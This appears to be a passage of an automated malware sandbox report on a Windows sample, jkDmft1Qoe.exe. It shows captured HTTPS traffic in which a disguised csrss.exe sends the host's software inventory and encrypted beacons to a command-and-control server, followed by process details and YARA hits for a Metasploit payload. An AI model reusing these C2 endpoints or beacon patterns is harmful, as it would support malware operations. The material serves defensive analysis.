                                                                    2021-10-18 06:01:27 UTC1OUTData Raw: 73 20 64 65 20 63 6f 72 72 65 63 63 69 c3 b3 6e 20 64 65 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 3a 20 65 73 70 61 c3 b1 6f 6c 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 41 64 64 72 65 73 73 42 6f 6f 6b 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 32 20 78 36 34 20 41 64 64 69 74 69 6f 6e 61 6c 20 52 75 6e 74 69 6d 65 20 2d 20 31 31
                                                                    Data Ascii: s de correccin de Microsoft Office 2016: espaol","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"AddressBook","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2012 x64 Additional Runtime - 11
                                                                    2021-10-18 06:01:27 UTC3OUTData Raw: 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 32 2e 30 2e 32 31 30 30 35 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 41 64 6f 62 65 20 41 63 72 6f 62 61 74 20 52 65 61 64 65 72 20 44 43 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 39 2e 30 31 32 2e 32 30 30 33 35 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 33 20 78 38 36 20 4d 69 6e 69 6d 75 6d 20 52 75 6e 74 69 6d 65 20 2d 20 31 32 2e 30 2e 32 31 30 30 35 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 32
                                                                    Data Ascii: splay_version":"12.0.21005","install_date":"20190627"},{"display_name":"Adobe Acrobat Reader DC","display_version":"19.012.20035","install_date":"20190627"},{"display_name":"Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005","display_version":"12
                                                                    2021-10-18 06:01:27 UTC4OUTData Raw: 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 32 39 32 30 37 31 32 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 37 33 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65
                                                                    Data Ascii: isplay_name":"Update for Microsoft Office 2016 (KB2920712) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit Edition","display_version":"","install_date":""},{"display_name
                                                                    2021-10-18 06:01:27 UTC8OUTData Raw: 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 44 65 66 69 6e 69 74 69 6f 6e 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 33 31 31 35 34 30 37 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 50 75 62 6c 69 73 68 65 72 20 32 30 31 36 20 28 4b 42 34 30 31 31 30 39 37 29
                                                                    Data Ascii: Bit Edition","display_version":"","install_date":""},{"display_name":"Definition Update for Microsoft Office 2016 (KB3115407) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Publisher 2016 (KB4011097)
                                                                    2021-10-18 06:01:27 UTC12OUTData Raw: 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 32 30 31 36 20 28 4b 42 34 34 38 34 33 30 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 33 20 78 38 36 20 41 64 64 69 74 69 6f 6e 61 6c 20 52 75 6e 74 69 6d 65 20 2d 20 31 32 2e 30 2e 32 31 30 30 35 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 32 2e 30 2e 32 31 30 30 35 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61
                                                                    Data Ascii: "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005","display_version":"12.0.21005","install_date":"20190627"},{"displa
                                                                    2021-10-18 06:01:27 UTC16OUTData Raw: 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 30 20 20 78 38 36 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 2d 20 31 30 2e 30 2e 33 30 33 31 39 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 33 30 33 31 39 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 31 34 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70
                                                                    Data Ascii: ion":"","install_date":""},{"display_name":"Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319","display_version":"10.0.30319","install_date":"20190627"},{"display_name":"Security Update for Microsoft Office 2016 (KB4484214) 32-Bit Edition","disp
                                                                    2021-10-18 06:02:17 UTC19INHTTP/1.1 404 Not Found
                                                                    Date: Mon, 18 Oct 2021 06:02:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-powered-by: PHP/8.0.11
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6e7jhhRmMzOf4z%2FUVKvoyuNsNr6MSHqph18xAkrV9pOs%2B%2Boq4%2BF2jzazvCMxyCBU2NQlVPEvKVhjhPqX1uOZ%2FoiylBBXdSh2%2FXzdzssuJjAhBpX72Lj2UL1Oon0%2B49gNCRBVJEbz"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 69ff8d5c680642ee-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                    2021-10-18 06:02:17 UTC20INData Raw: 34 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
                                                                    2021-10-18 06:02:17 UTC21INData Raw: 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65
                                                                    Data Ascii: al 9pt "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></he
                                                                    2021-10-18 06:02:17 UTC21INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.449768172.67.139.144443C:\Windows\rss\csrss.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2021-10-18 06:01:33 UTC18OUTPOST /api/poll HTTP/1.1
                                                                    Host: server1.trumops.com
                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
                                                                    Content-Length: 640
                                                                    Accept-Encoding: gzip
                                                                    2021-10-18 06:01:33 UTC19OUTData Raw: 72 4f 78 37 44 58 76 59 74 62 38 45 61 75 4e 67 43 61 50 43 66 6e 32 6c 44 36 76 4f 7a 36 47 78 69 32 65 74 51 34 42 2b 73 45 4b 6d 57 62 2f 32 4d 59 72 59 57 72 5a 47 61 79 30 43 51 46 50 41 78 58 67 76 6a 72 74 2b 35 71 46 41 65 67 50 71 68 68 4b 71 6e 77 38 71 74 61 42 6a 4e 36 48 72 7a 2b 77 4c 36 45 59 5a 62 41 6f 7a 6e 48 43 2f 67 46 75 50 30 6e 4a 75 31 6f 53 4c 38 4b 57 6a 65 76 78 6c 62 77 36 55 32 67 65 2f 65 46 6d 49 49 39 32 39 73 58 48 45 31 6e 4b 33 41 72 4d 6b 6c 2f 4b 47 4d 2f 4c 54 71 50 42 47 31 35 68 35 52 31 44 4f 64 2b 46 4f 47 6a 62 4e 36 2b 57 43 62 36 56 48 57 6b 39 73 4c 33 64 6e 30 31 38 31 43 34 4a 61 73 67 2f 56 35 4b 61 50 66 39 31 31 49 54 58 51 69 4c 50 49 6e 53 73 72 72 4c 2f 73 2f 46 4c 2f 71 73 38 4b 6b 36 39 35 72 62 41
                                                                    Data Ascii: rOx7DXvYtb8EauNgCaPCfn2lD6vOz6Gxi2etQ4B+sEKmWb/2MYrYWrZGay0CQFPAxXgvjrt+5qFAegPqhhKqnw8qtaBjN6Hrz+wL6EYZbAoznHC/gFuP0nJu1oSL8KWjevxlbw6U2ge/eFmII929sXHE1nK3ArMkl/KGM/LTqPBG15h5R1DOd+FOGjbN6+WCb6VHWk9sL3dn0181C4Jasg/V5KaPf911ITXQiLPInSsrrL/s/FL/qs8Kk695rbA
                                                                    2021-10-18 06:02:21 UTC21INHTTP/1.1 404 Not Found
                                                                    Date: Mon, 18 Oct 2021 06:02:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-powered-by: PHP/8.0.11
                                                                    set-cookie: PHPSESSID=msr8acg9pq7sp3dcop8c04029e; path=/; HttpOnly
                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                    pragma: no-cache
                                                                    access-control-allow-credentials: false
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MgqHad%2BRL1Jwi19koLru3c3g79m4yhxIQIen93O1%2FIzAOqJAqXouucy1HssWOW9a2T8dJbYXCbBqiBBas6ee%2FLto73zfabvgBZk3r04GcxpJybUfENx4vZPL%2BJKObmAFzN6d9qUJ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 69ff8d80de494e32-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                    2021-10-18 06:02:21 UTC22INData Raw: 65 38 0d 0a 47 44 6a 72 57 46 66 31 6e 45 55 41 62 56 64 49 7a 42 2b 72 42 4d 4d 61 67 31 30 31 6f 70 77 6e 37 4c 6a 55 44 52 61 75 47 75 68 70 46 6d 2f 31 69 61 39 42 32 62 64 57 48 51 70 61 59 4c 67 5a 6b 63 78 4d 73 45 6f 33 49 78 74 53 71 43 66 6c 76 55 76 33 52 76 6f 38 78 71 4f 6c 67 6f 38 4a 64 4d 61 56 70 70 6c 49 42 77 2f 4c 47 73 4f 52 68 30 75 71 58 38 6c 6e 73 46 32 46 76 58 48 37 78 72 62 48 4b 41 71 62 79 48 68 70 53 44 59 50 58 67 56 6a 41 72 49 49 77 6b 63 52 57 45 33 78 71 38 4c 57 38 63 70 70 56 35 53 4c 5a 66 66 53 53 54 53 73 59 4c 33 4d 6e 70 48 38 67 49 4f 34 4d 67 52 79 57 30 4f 66 52 6f 4a 76 4c 49 4a 72 48 33 6d 4b 58 71 73 34 32 2f 75 38 67 6d 44 5a 37 30 4e 37 59 67 3d 3d 0d 0a
                                                                    Data Ascii: e8GDjrWFf1nEUAbVdIzB+rBMMag101opwn7LjUDRauGuhpFm/1ia9B2bdWHQpaYLgZkcxMsEo3IxtSqCflvUv3Rvo8xqOlgo8JdMaVpplIBw/LGsORh0uqX8lnsF2FvXH7xrbHKAqbyHhpSDYPXgVjArIIwkcRWE3xq8LW8cppV5SLZffSSTSsYL3MnpH8gIO4MgRyW0OfRoJvLIJrH3mKXqs42/u8gmDZ70N7Yg==
                                                                    2021-10-18 06:02:21 UTC22INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.449769104.21.79.9443C:\Windows\rss\csrss.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2021-10-18 06:01:45 UTC19OUTGET /api/cdn?c=1a0ceff6e935c933&uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 HTTP/1.1
                                                                    Host: server1.trumops.com
                                                                    User-Agent: Go-http-client/1.1
                                                                    Accept-Encoding: gzip
                                                                    2021-10-18 06:02:35 UTC22INHTTP/1.1 200 OK
                                                                    Date: Mon, 18 Oct 2021 06:02:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-powered-by: PHP/8.0.11
                                                                    access-control-allow-credentials: false
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zuSgSsvjkAE8UYMxxWMQFb9SRGfpcVTYqIhk98nXIlngDZGeSl3NnP%2B1s6FSoV3H1GVbKaMafdFLdE4g0A1zn1CD6v0DYQWAq5%2BHXhll4AQ3wVcnV9JAq81hCR5spkYNG%2FNhtjKD"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 69ff8dca8d40973c-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                    2021-10-18 06:02:35 UTC23INData Raw: 31 33 34 0d 0a 73 43 66 59 5a 6f 69 74 56 69 63 7a 56 74 58 2f 47 4f 48 4f 51 6b 62 72 57 49 2b 42 6b 79 6a 48 46 35 2f 68 44 37 32 6e 65 37 4a 6a 68 6c 66 70 52 32 75 31 7a 47 59 6a 30 31 2f 39 39 4d 31 2f 44 78 64 4b 5a 32 37 38 5a 75 79 2f 4a 32 2f 63 39 38 37 59 46 4d 50 44 6b 66 4a 5a 53 32 66 35 45 42 64 7a 6d 46 38 63 59 48 43 6c 58 6c 6b 45 65 34 44 76 6c 71 53 65 39 7a 51 30 78 62 79 4f 74 57 39 2f 53 50 65 38 53 65 4f 2f 37 65 66 31 44 36 34 39 43 6d 36 65 58 41 45 64 2b 4d 38 74 30 69 62 47 4b 70 77 53 68 67 4d 67 4f 47 53 6f 76 37 61 61 47 66 75 53 58 59 4d 45 4c 38 50 51 55 68 48 32 50 43 57 38 73 52 31 73 4f 52 32 6a 57 6c 4d 2f 65 57 6f 67 35 47 54 45 4e 51 76 6e 50 55 77 77 6c 66 58 6a 46 2b 36 52 39 56 57 77 4a 6f 37 69 6c 4b 2f 49 49 52
                                                                    Data Ascii: 134sCfYZoitViczVtX/GOHOQkbrWI+BkyjHF5/hD72ne7JjhlfpR2u1zGYj01/99M1/DxdKZ278Zuy/J2/c987YFMPDkfJZS2f5EBdzmF8cYHClXlkEe4DvlqSe9zQ0xbyOtW9/SPe8SeO/7ef1D649Cm6eXAEd+M8t0ibGKpwShgMgOGSov7aaGfuSXYMEL8PQUhH2PCW8sR1sOR2jWlM/eWog5GTENQvnPUwwlfXjF+6R9VWwJo7ilK/IIR
                                                                    2021-10-18 06:02:35 UTC24INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.449841104.21.79.9443C:\Windows\rss\csrss.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2021-10-18 06:02:44 UTC24OUTPOST /api/poll HTTP/1.1
                                                                    Host: server1.trumops.com
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
                                                                    Content-Length: 660
                                                                    Accept-Encoding: gzip
                                                                    2021-10-18 06:02:44 UTC24OUTData Raw: 49 65 6a 31 63 58 2f 38 4c 35 73 63 51 66 61 34 2b 45 6e 77 35 63 53 6e 4e 37 49 6e 52 61 44 33 41 45 49 42 6c 6e 56 58 32 6e 74 75 73 75 63 2b 74 78 30 4e 41 61 53 68 39 6d 34 6c 61 42 66 43 73 6c 62 66 77 53 5a 30 51 48 6f 42 51 6b 36 51 4e 31 59 4f 6c 41 59 42 6f 36 61 58 6c 64 54 78 59 58 6d 35 48 36 53 6c 6e 35 56 62 42 65 71 67 35 67 67 78 2b 2b 6b 59 39 78 47 32 70 41 62 59 38 32 37 4e 68 36 63 6c 75 49 68 57 48 6f 69 4c 58 2b 69 64 6d 74 62 47 34 36 39 71 67 46 67 53 39 6b 63 70 47 6e 53 72 73 55 50 37 49 59 44 72 51 6b 52 4b 54 57 39 7a 75 6d 50 55 66 39 58 77 49 59 30 39 78 6b 6a 78 46 5a 65 6a 4b 49 76 67 56 39 6a 58 38 6e 75 43 61 76 78 6e 35 45 4b 32 5a 50 30 41 32 55 79 6a 73 39 33 52 6f 30 48 61 56 6d 74 46 4f 4a 54 62 7a 45 41 4f 42 56 62
                                                                    Data Ascii: Iej1cX/8L5scQfa4+Enw5cSnN7InRaD3AEIBlnVX2ntusuc+tx0NAaSh9m4laBfCslbfwSZ0QHoBQk6QN1YOlAYBo6aXldTxYXm5H6Sln5VbBeqg5ggx++kY9xG2pAbY827Nh6cluIhWHoiLX+idmtbG469qgFgS9kcpGnSrsUP7IYDrQkRKTW9zumPUf9XwIY09xkjxFZejKIvgV9jX8nuCavxn5EK2ZP0A2Uyjs93Ro0HaVmtFOJTbzEAOBVb
                                                                    2021-10-18 06:03:33 UTC24INHTTP/1.1 404 Not Found
                                                                    Date: Mon, 18 Oct 2021 06:03:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-powered-by: PHP/8.0.11
                                                                    set-cookie: PHPSESSID=c736gp74eq681lbg8qrkf25c2s; path=/; HttpOnly
                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                    pragma: no-cache
                                                                    access-control-allow-credentials: false
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjJp%2FH0fSWWxfTYWA7zwRjoI7bZtPkocfoGHJ4e5RX%2F3mAoDoWRTLYBA3mWnjETR%2BBkl%2FDm6Z0fAvwUS%2BQfOW4pgeSWwqn4UzdBrsoE6VxOMsXgBWzJHovfUijYMuRV4nPXXU1Rs"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 69ff8f3c3c80701c-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                    2021-10-18 06:03:33 UTC25INData Raw: 65 38 0d 0a 57 73 51 2f 6d 72 67 76 69 73 4e 6e 66 42 44 34 35 50 6c 67 35 5a 6d 30 78 56 48 39 68 78 70 4c 39 51 46 5a 58 4a 73 57 5a 44 76 4a 66 38 42 67 49 72 75 57 50 31 7a 61 78 67 37 31 53 42 70 78 50 49 73 49 52 75 4f 54 47 72 37 48 63 65 56 34 4e 71 35 67 48 52 2f 6a 37 53 37 67 4b 63 4b 45 75 2f 73 63 6a 68 7a 79 63 75 61 75 4a 33 45 79 71 51 4a 2b 75 4b 2b 78 6c 52 4f 69 4e 69 44 39 39 37 33 53 48 35 34 47 4b 51 6c 34 43 56 57 4c 45 62 59 6f 2b 61 6a 6b 71 6e 48 59 78 34 38 4a 76 5a 69 68 31 57 51 59 76 59 46 36 79 69 2f 30 6d 70 30 47 48 31 5a 6a 4c 4f 66 64 47 6c 71 61 2f 36 71 49 75 32 41 4f 52 35 43 38 4d 78 43 6d 41 58 70 7a 76 72 6c 67 44 57 61 37 42 56 7a 4a 71 6a 4f 4b 46 77 3d 3d 0d 0a
                                                                    Data Ascii: e8WsQ/mrgvisNnfBD45Plg5Zm0xVH9hxpL9QFZXJsWZDvJf8BgIruWP1zaxg71SBpxPIsIRuOTGr7HceV4Nq5gHR/j7S7gKcKEu/scjhzycuauJ3EyqQJ+uK+xlROiNiD9973SH54GKQl4CVWLEbYo+ajkqnHYx48JvZih1WQYvYF6yi/0mp0GH1ZjLOfdGlqa/6qIu2AOR5C8MxCmAXpzvrlgDWa7BVzJqjOKFw==
                                                                    2021-10-18 06:03:33 UTC26INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: jkDmft1Qoe.exe PID: 7032 Parent PID: 4800

                                                                    General

                                                                    Start time:08:01:16
                                                                    Start date:18/10/2021
                                                                    Path:C:\Users\user\Desktop\jkDmft1Qoe.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\jkDmft1Qoe.exe'
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000000.657671023.000000000098A000.00000008.00020000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000000.657671023.000000000098A000.00000008.00020000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: TrustedInstaller.exe PID: 7128 Parent PID: 568

                                                                    General

                                                                    Start time:08:01:19
                                                                    Start date:18/10/2021
                                                                    Path:C:\Windows\servicing\TrustedInstaller.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                                    Imagebase:0x7ff760fb0000
                                                                    File size:131584 bytes
                                                                    MD5 hash:4578046C54A954C917BB393B70BA0AEB
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: jkDmft1Qoe.exe PID: 3176 Parent PID: 7032

                                                                    General

                                                                    Start time:08:01:20
                                                                    Start date:18/10/2021
                                                                    Path:C:\Users\user\Desktop\jkDmft1Qoe.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\jkDmft1Qoe.exe
                                                                    Imagebase:0x400000
                                                                    File size:9054208 bytes
                                                                    MD5 hash:099AD37CECCDFA74229D976B10973736
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
